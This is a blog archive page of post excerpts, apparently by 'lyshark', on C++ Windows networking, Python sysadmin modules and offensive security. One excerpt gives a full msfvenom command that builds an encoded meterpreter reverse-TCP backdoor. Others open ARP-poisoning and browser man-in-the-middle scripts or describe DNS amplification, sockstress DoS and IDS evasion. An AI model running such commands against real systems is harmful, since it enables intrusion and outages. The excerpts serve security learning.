摘要: #include <string> #include<iostream> #include<windows.h> #include <sstream> using namespace std; string WORDToString(WORD w) { char tmpbuff[16]; sprin 阅读全文
posted @ 2018-06-09 09:56 lyshark 阅读(1001) 评论(0) 推荐(0)
摘要: #include<winsock2.h> #include<iostream> #include<string> using namespace std; #pragma comment(lib, "WS2_32.lib") string getIP() { WSADATA WSAData; cha 阅读全文
posted @ 2018-06-09 09:55 lyshark 阅读(1785) 评论(0) 推荐(1)
摘要: #include<stdio.h> #include<winsock2.h> //该头文件需在windows.h之前 #include<windows.h> #include<string> #include<iostream> #pragma comment(lib,"ws2_32.lib") u 阅读全文
posted @ 2018-06-09 09:54 lyshark 阅读(4542) 评论(0) 推荐(1)
摘要: Numpy是Python开源的数值计算扩展,可用来存储和处理大型矩阵,比Python自身数据结构要高效;matplotlib是一个Python的图像框架,使用其绘制出来的图形效果和MATLAB下绘制的图形类似。 阅读全文
posted @ 2018-06-07 21:11 lyshark 阅读(4383) 评论(0) 推荐(1)
摘要: 文件内容差异对比方法 使用diffie模块实现文件内容差异对比。dmib作为 Python的标准库模块,无需安装,作用是对比文本之间的差异,且支持输出可读性比较强的HTML文档,与 Linux下的dif命令相似。我们可以使用 diffie对比代码、配置文件的差别,在版本控制方面是非常有用。 Pyth 阅读全文
posted @ 2018-06-07 13:01 lyshark 阅读(967) 评论(0) 推荐(1)
摘要: 系统性能信息模块psutil psutil能够轻松实现获取系统运行的进程和系统利用率包括(CPU,内存,磁盘 和网络)等。主要用于系统监控。对于系统维护来说是个不错的模块。 wget https://files.pythonhosted.org/packages/14/a2/8ac7dda36eac 阅读全文
posted @ 2018-06-07 09:06 lyshark 阅读(1626) 评论(0) 推荐(0)
摘要: nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统。 阅读全文
posted @ 2018-06-04 15:07 lyshark 阅读(1676) 评论(0) 推荐(0)
摘要: 生成windows后门 1.首先生成后门 [root@localhost ~]# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 lhost=192.168.1.1 lport=6666 -f exe > 阅读全文
posted @ 2018-06-04 13:56 lyshark 阅读(5842) 评论(0) 推荐(1)
摘要: Cheat Engine 一般简称CE,是一个开放源代码的游戏修改软件,其功能包括,内存扫描、十六进制编辑器、调试工具,Cheat Engine 自身附带了辅助制作工具,可以用它直接生成窗体工具,CE可以说是目前最优秀的修改器不是之一,这个工具绝对值得你去学习,只要花一点时间就够了。 阅读全文
posted @ 2018-05-30 13:21 lyshark 阅读(229826) 评论(0) 推荐(6)
摘要: 1.配置服务器,开启注释 vim /etc/httpd/conf/httpd.conf 292 # (You will also need to add "ExecCGI" to the "Options" directive.) 293 # 294 AddHandler cgi-script .c 阅读全文
posted @ 2018-05-29 12:11 lyshark 阅读(1349) 评论(0) 推荐(0)
摘要: 通常一个DNS数据包,客户端发送DNSQR请求包,服务器发送DNSRR响应包。一个DNSQR包含有查询的名称qname、查询的类型qtype、查询的类别qclass。一个DNSRR包含有资源记录名名称rrname、类型type、资源记录类别rtype、TTL等等。 阅读全文
posted @ 2018-05-28 22:48 lyshark 阅读(3585) 评论(0) 推荐(0)
摘要: 该工具第一是查询执行参数`-a Search xxx.com`第二是爆破`-a Blast domain wordlist`,工具同样可以使用DNS域名的枚举,和上面的区别就在于该方法使用了DNS迭代查询. 阅读全文
posted @ 2018-05-28 22:32 lyshark 阅读(3247) 评论(0) 推荐(0)
摘要: 基于浏览器的中间人攻击 #coding=utf-8 import win32com.client import time import urlparse import urllib data_receiver = "http://localhost:8080/" target_sites = {} 阅读全文
posted @ 2018-05-28 22:16 lyshark 阅读(1452) 评论(0) 推荐(0)
摘要: 实现序列命令解析: 该功能实现了对序列任务的解析,我们可以将需要执行的命令写成序列,当需要使用时可直接执行任务. 首先需要定义两个配置文件,配置文件config.json用于存放主机组信息,apache.json则用于存放需要执行的命令序列. config.json { "MyWebServer": 阅读全文
posted @ 2018-05-28 21:27 lyshark 阅读(880) 评论(0) 推荐(0)
摘要: 查询放大攻击的原理是,通过网络中存在的DNS服务器资源,对目标主机发起的拒绝服务攻击,其原理是伪造源地址为被攻击目标的地址,向DNS递归服务器发起查询请求,此时由于源IP是伪造的,固在DNS服务器回包的时候,会默认回给伪造的IP地址,从而使DNS服务成为了流量放大和攻击的实施者,通过查询大量的DNS服务器,从而实现反弹大量的查询流量,导致目标主机查询带宽被塞满,实现DDOS的目的。 阅读全文
posted @ 2018-05-28 21:14 lyshark 阅读(1195) 评论(0) 推荐(0)
摘要: 封装钉钉通知接口: 接口的调用需要传入需要通知特定人的手机号,调用后会在顶顶群内通知. import requests import urllib.parse import time,hmac,hashlib,base64,json class DingToken(): def __init__(s 阅读全文
posted @ 2018-05-28 21:05 lyshark 阅读(1191) 评论(0) 推荐(0)
摘要: Web隐藏目录扫描: 首先你需要自己寻找一个靠谱的字典,放入脚本根目录并命名为dict.log每行一个路径名称. import requests,threading import argparse from queue import Queue head={'user-agent':'Mozilla 阅读全文
posted @ 2018-05-28 20:10 lyshark 阅读(1677) 评论(0) 推荐(0)
摘要: 利用Scapy进行ARP缓存投毒 from scapy.all import * import os import sys import threading import signal def restore_target(gateway_ip,gateway_mac,target_ip,targe 阅读全文
posted @ 2018-05-28 20:00 lyshark 阅读(1824) 评论(0) 推荐(0)
摘要: 应用Python支持的混杂模式,抓取流经网卡的数据包,并对IP以及ICMP数据包进行拆包,打印出我们所需要的字段信息。 阅读全文
posted @ 2018-05-28 19:49 lyshark 阅读(1618) 评论(0) 推荐(0)
摘要: Sock Stress 全连接攻击属于TCP全连接攻击,因为需要建立一次完整的TCP三次握手,该攻击的关键点就在于,攻击主机将windows窗口缓冲设置为0,实现的拒绝服务。攻击者向目标发送一个很小的流量,但是会造成产生的攻击流量是一个巨大的,该攻击消耗的是目标系统的CPU/内存资源,使用低配版的电脑,依然可以让庞大的服务器拒绝服务,也称之为放大攻击。 阅读全文
posted @ 2018-05-28 19:41 lyshark 阅读(1474) 评论(0) 推荐(1)
摘要: 所谓愚弄入侵检测系统,其原理是使通过制造假的攻击迹象来触发IDS警报,从而让目标系统产生大量警告而难以作出合理的判断,利用Scapy这个第三方Python库,可以很好的实现对入侵检测系统的愚弄。 阅读全文
posted @ 2018-05-28 19:24 lyshark 阅读(3230) 评论(0) 推荐(0)
摘要: Pexpect是一个纯Python模块,用于生成子应用程序;控制他们;并对输出中的预期模式作出响应。Pexpect的工作原理类似于Don Libes的Expect。Pexpect允许脚本生成一个子应用程序,并像键入命令一样控制它。Pexpect可用于自动化交互应用程序,如ssh、ftp、passwd、telnet等。它可用于自动化安装脚本,以在不同服务器上复制软件包安装。它可以用于自动化软件测试。 阅读全文
posted @ 2018-05-28 19:05 lyshark 阅读(5865) 评论(0) 推荐(1)
摘要: 在注册表中分析无线访问热点 以管理员权限开启cmd,输入如下命令来列出每个网络显示出profile Guid对网络的描述、网络名和网关的MAC地址 reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\N 阅读全文
posted @ 2018-05-28 17:21 lyshark 阅读(3687) 评论(0) 推荐(0)
摘要: dpkt项目是一个python模块,用于快速、简单的数据包解析,并定义了基本TCP/IP协议,使用该库可以快速解析通过各类抓包工具抓到的数据包,从而提取分析包内的参数。 阅读全文
posted @ 2018-05-28 16:58 lyshark 阅读(7665) 评论(0) 推荐(1)
摘要: TTL 由8比特组成,可以用来确定在到达目的地之前数据包经过了几跳,当计算机发送一个IP数据包时会设置TTL字段为数据包在到达目的地之前所应经过的中继跳转的上限值,数据包每经过一个路由设备,TTL值就自减一,若减至0还未到目的地,路由器会丢弃该数据包以防止无限路由循环。 阅读全文
posted @ 2018-05-28 16:50 lyshark 阅读(2835) 评论(0) 推荐(0)